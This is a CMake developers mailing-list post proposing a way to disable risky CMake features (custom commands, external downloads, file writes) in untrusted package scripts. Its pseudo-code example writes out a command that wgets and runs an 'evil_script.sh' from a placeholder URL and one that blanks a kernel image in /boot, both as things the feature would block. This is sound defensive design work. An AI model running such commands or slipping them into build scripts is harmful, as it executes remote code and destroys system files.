Hi, I'm working on a package manager based on cmake. And some cmake instructions are downloaded with user packages. I'd like to have an ability to deny some cmake features in such external untrusted insertions. 1. Disable any COMMAND invokations (in exec[ute]_command, add_custom_command, add_custom_target etc.) 2. Disable any external_project downloads etc. 3. Disable specific cmake commands (e.g. file(WRITE ...) 4. add more potentially unsecure features here
Potential vulnerabilities are (according to previous list): 1. Invocation of 'rm -rf' command. The dir can be / in sudo or ~ in user mode. 2. Downloading of unwanted scripts. Also applicable to 1). 3. Rewriting important system files (like /boot/kernel.image..., /lib/libc... etc) How it can be done? 1. Set a new policy? 2,3. Add new cmake command: enable_command(cmd, {On|Off}) Example: ... # trusted code above set_policy(disable COMMAND) # pseudo enable_command(file, Off) # untrusted ON execute_command( COMMAND wget http://.../evil_script.sh COMMAND ./evil_script.sh ) # will throw an error - COMMAND is denied file(WRITE /boot/vmlinuz-4.4.0-34-generic "") # will throw an error - file is banned # untrusted OFF enable_command(file, On) set_policy(enable COMMAND) # pseudo # trusted code below ... What do you think? Is it possible in the latest CMake? Or can it be added in the future? -- Egor Pugin -- Powered by www.kitware.com Please keep messages on-topic and check the CMake FAQ at: http://www.cmake.org/Wiki/CMake_FAQ Kitware offers various services to support the CMake community. For more information on each offering, please visit: CMake Support: http://cmake.org/cmake/help/support.html CMake Consulting: http://cmake.org/cmake/help/consulting.html CMake Training Courses: http://cmake.org/cmake/help/training.html Visit other Kitware open-source projects at http://www.kitware.com/opensource/opensource.html Follow this link to subscribe/unsubscribe: http://public.kitware.com/mailman/listinfo/cmake-developers